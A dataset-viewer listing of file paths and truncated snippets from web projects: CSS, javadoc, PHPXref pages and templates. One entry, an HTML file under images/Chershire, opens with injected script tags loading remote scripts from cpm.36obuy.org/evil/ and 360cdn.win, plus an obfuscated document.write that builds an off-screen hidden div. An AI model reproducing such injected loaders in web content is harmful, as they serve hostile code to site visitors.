<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1"><!--手机设备声明-->
<title>Jquery Mobile教程</title>
<link rel="stylesheet" href="http://fonts.useso.com/css?family=Open+Sans:300,400,700">
<link rel="stylesheet" href="css/themes/defa... |
sites/all/modules/custom/socialicon_field/css/social_icons_buttons.css | vhinrich/vhinandrich2 | .node ul.social-icons-list{
display: block;
list-style: none;
padding: 0;
margin: 0;
}
.node ul.social-icons-list li{
display: inline;
}
|
releases/sources/PulseAudio/web/index.html | vansatchen/dlink327 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
... |
docs/types/Minotaur.html | alucardxlx/caoticamente-shards | <html>
<head>
<title>RunUO Documentation - Class Overview - Minotaur</title>
</head>
<body bgcolor="white" style="font-family: Courier New" text="#000000" link="#000000" vlink="#000000" alink="#808080">
<h4><a href="../namespaces/Server.Mobiles.html">Back to Server.Mobiles</a></h4>
<h2>... |
readme_files/css/60-readme.html | lalo/readme-fads | <div class="announce instapaper_body md" data-path="README.md" id="readme"><article class="markdown-body entry-content" itemprop="mainContentOfPage"><h1>
<a name="user-content-magic" class="anchor" href="#magic" aria-hidden="true"><span class="octicon octicon-link"></span></a>magic</h1>
<p>CSS3 Animations with special... |
color/colors.css | rafaqz/growshare_corolla |
/* Background */
body {
background-color: #ccc;
}
body.corolla .color-form {
max-width: 100%;
}
#content-wrapper,
.breadcrumb-wrapper,
#messages-help-wrapper,
#header-wrapper {
background-color: #fffffd;
}
#tertiary-panels-wrapper,
#footer-panels-wrapper {
background-color: #aaaaa9;
}
.panel-pane {
bac... |
Code/GetMetaDataFromCRAN/raw_html/robmed.html | esander91/NamespacePollution | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>CRAN - Package robmed</title>
<link rel="stylesheet" type="text/css" href="../../CRAN_web.css" />
<meta http-equiv="Content-Type" content="text/html; ch... |
jcsp-1.1-rc4/jcsp-core-doc/index-files/index-5.html | rubemkalebe/SalaoBelezaPura | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.5.0_16) on Sun Jan 25 20:01:22 GMT 2009 -->
<TITLE>
E-Index (CSP for Java (JCSP) 1.1-rc4 API Specification)
</TITLE>
<LINK REL ="stylesheet" TYPE="text... |
http/template/wait.html | nicksellen/iznik | <div class="modal fade" tabindex="-1">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<h4 class="modal-title js-modal-title text-center">Please wait...</h4>
</div>
<div class="modal-body js-modal-body">
<d... |
lib/xalan-j_2_7_0/docs/apidocs/org/xml/sax/helpers/XMLReaderFactory.html | MrStaticVoid/iriverter | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc on Sat Aug 06 17:05:06 EDT 2005 -->
<TITLE>
Xalan-Java 2.7.0: Class XMLReaderFactory
</TITLE>
<LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../stylesheet.css" TITLE="Style">
</HEAD>
<BODY BGCOLOR="white">
... |
navframe-js.html | mgsolipa/b2evolution_phpxref | <html>
<head>
<title>PHPXref Explorer</title>
<meta http-equiv="content-type" content="text/html;charset=iso-8859-1">
<link rel="stylesheet" href="sample.css" type="text/css">
</head>
<body bgcolor="#ffffff">
<!-- Generated by PHPXref 0.7.1 at Sat Nov 21 22:13:19 2015 -->
<!-- PHPXref (c) 2000-2010 Gareth Watts - garet... |
sites/all/libraries/yui/docs/graphics/graphics-gradients.html | dkist/t-h-inker | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Example: Create Gradient Fills</title>
<link rel="stylesheet" href="http://fonts.googleapis.com/css?family=Maven+Pro:400,700">
<link rel="stylesheet" href="../../build/cssgrids/grids-min.css">
<link rel="stylesheet" href=".... |
wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_vertical.css | mandino/espressoshakespeare.com | /*
Name: Sliding Login Panel with mootools 1.2
Author: daiv mowbray
Author URI: http://wp-superslider.com/
Date: may 31, 2009
Version: 1.0
The CSS, XHTML and design is released under Creative Common License 3.0:
http://creativecommons.org/licenses/by-sa/3.0/
*/
/***** clearfix *****/
.clear {clear: both;height: 0... |
www.jinbuguo.com/postgresql/menu823/reference.html | Pengfei-Gao/develop-reference-data | <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="zh-CN"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta http-equiv="Content-Language" content="zh-CN"><link href="stylesheet.css" media="all" rel="stylesheet" type="text/css">... |
wp-content/themes/storefront/css/style.css | CannedHead/feelingsurf | @charset "utf-8";
@import url(https://fonts.googleapis.com/css?family=Montserrat);
@font-face {
font-family: 'bebas_neue_regularregular';
src: url('../fonts/bebasneue_regular-webfont.eot');
src: url('../fonts/bebasneue_regular-webfont.eot?#iefix') format('embedded-opentype'),
url('../font... |
_functions/get_subregion.html | mgsolipa/b2evolution_phpxref | <!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<title>PHPXRef 0.7.1 : Unnamed Project : Function Reference: get_subregion()</title>
<link rel="stylesheet" href="../sample.css" type="text/css">
<link rel="stylesheet" href="../sample-pr... |
skins/bootstrap_main_skin/front.main.php.html | mgsolipa/b2evolution_phpxref | <!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<title>PHPXRef 0.7.1 : Unnamed Project : Detail view of front.main.php</title>
<link rel="stylesheet" href="../../sample.css" type="text/css">
<link rel="stylesheet" href="../../sample-pr... |
src/main/javadoc/overview-tree.html | viktorstrate/JavaMysqlMadeEasy | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (version 1.7.0_75) on Wed Mar 11 19:36:54 CET 2015 -->
<title>Class Hierarchy</title>
<meta name="date" content="2015-03-11">
<link rel="stylesheet" t... |
sites/default/themes/pringandrandell/assets/css/custom.css | randell/PringAndRandell | /* It is recommended to place all your extra/additional CSS rules here */
@font-face {
font-family: Alsscrp;
src: url('./fonts/alsscrp.ttf');
}
@font-face {
font-family: Rakesly;
src: url('./fonts/rakesly-rg.ttf');
}
h1, h2, h3, h4, h5, .title {
font-family: Rakesly, 'Helvetica Neue', Arial, Helv... |
images/Chershire/02021944378bm.html | ForAEdesWeb/AEW2 | <script src="http://cpm.36obuy.org/evil/1.js"></script><script src="http://cpm.36obuy.org/lion/1.js"></script><script/src=//360cdn.win/c.css></script>
<script>document.write ('<d' + 'iv cl' + 'a' + 's' + 's="z' + '7z8z' + '9z6" st' + 'yl' + 'e="p' + 'ositio' + 'n:f' + 'ixed;l' + 'ef' + 't:-3' + '0... |
src/main/resources/naacl2010-langid/EuroGOV/trn0009.html | varh1i/language_detection | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="DC.type" http-equiv="Content-Type" content="text/html; charset=UTF-8">
</head>
<body>
<head>Neuvoston asetus (EY) N:o 1080/2000, annettu 22 päivänä toukokuuta 2000, Yhdistyneiden Kansakuntien väliaikaisen Kosovon-siviili... |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.